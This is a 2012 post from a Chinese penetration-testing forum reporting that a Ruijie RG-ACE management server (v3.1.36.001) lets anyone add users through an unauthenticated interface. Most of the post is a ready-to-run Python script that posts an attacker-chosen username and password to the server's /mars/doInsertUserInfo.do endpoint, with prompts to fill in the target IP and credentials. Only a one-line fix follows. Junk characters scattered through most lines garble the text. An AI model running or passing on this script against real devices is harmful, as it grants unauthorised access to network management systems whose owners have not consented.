找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
返回列表 发新帖
查看: 2790|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)5 N; z3 M. t8 p( s: a  {3 i# w0 Z

9 f6 W! i# N3 |, A7 z: L( U2 E8 s; E9 {0 |# b
测试的具体版本是6 C) f% C) M4 E( Q. d
产品名称: 锐捷应用控制引擎
7 J& Z7 ]: i4 r! ]. R: B' ~版本号: 3.1.36.001 TC
: Q; T- v" N# {, C; ~# ^编译时间: 201104291730
1 y" e) w7 _/ x4 v! D
2 f' `& e: r6 M8 y# _7 i2 Q3 v  h$ n
漏洞证明:+ _9 }" Z( Z5 v' L1 ~7 g

& N  Y& D3 o5 T) p8 D9 _: t& e- n. j7 k" h, m

  k3 \5 X& b; [# W3 h$ A% Y3 v' u: U$ Y3 w% O' Z
2 R1 i! W6 f( D9 A& K; @+ W
* u1 T3 X4 |: T
执行脚本4 J$ C9 t! q/ P. ]( M; e7 p
#! /usr/bin/env python
% ?  r* O4 j+ f/ G6 F#coding=gbk
) Y( c" @1 w0 x. f" Q# {#RG-ACE管理服务器 V3.1.36.001
% W7 c4 i) X! Z* V  P% gimport urllib2, urllib,cookielib' h' r! X1 r! I+ C6 R, G
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP& y6 G: H9 s+ l3 P
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))/ o; c* S) L5 d* h  _
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]$ q1 ?- e) R- N3 M" n0 m
post=(("event","userManager.doInsertUserInfo"),
. s# b7 E- P3 E& B$ p- m' i: D("useractionname","addButtonValue"),
) ^. [& {# B5 ]& }# _2 N("useropermanager","userManager"),& G/ ]! H( B" a" Q- k
("userName","t"), #######账号自己加
; u9 q7 q7 u, |: N' N1 A; P6 ]& L("pwd","aaaaaa"),######密码自己加
! x* |* Q9 l' i("trueName","ad"),
2 z% o2 d6 n! v% r; S("email",""),3 F% F  P, h' t
("mobilePhone",""),
" j1 w- c* r& f  z5 w* m6 d1 V6 `("officePhone",""),# T$ _* Z$ q: w# t+ J5 f  a
("addr",""),
3 S  I3 ^" W4 V, h("submit","确定"))
' x' R& H* f$ H' m" }9 s8 R$ h- zurllib2.install_opener(opener)4 h8 W; g3 R+ d- g( Y: N  e1 ^& v1 F
p=urllib2.urlopen(url, urllib.urlencode(post)).read()! \1 [1 ?6 P2 b% b* l% O
print "Done"
' W2 {0 ]! I& z5 E5 B2 H" ^" t1 `% b" j) B) \* U+ g
登录,连接设备
0 N% j# o- v8 p# `6 V* u5 `" u1 B' U% p
3 L3 f( P* Z( G* w7 |) A3 ?2 h

" H/ t' N2 d6 k' ?0 Q; I- I5 D0 v2 @. n. ]# C0 h
2 x3 \0 d% V% x' g
默认的管理员admin权限更大点
4 K8 k. E: x. T6 @/ d+ B9 D4 a* y6 E! x
3 I% R0 o1 c# R- c% N
# a' q2 V' F+ c2 R9 F# f
* @4 p3 ?5 ^( @3 i8 _0 {" X

- e2 _' J: f8 E+ t' \修复方案:
7 u; I6 m" V) I* y加强对接口的权限验证
+ z8 h; \; F. s, p0 S" D0 G7 @& ^$ z  U0 N6 F, P
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表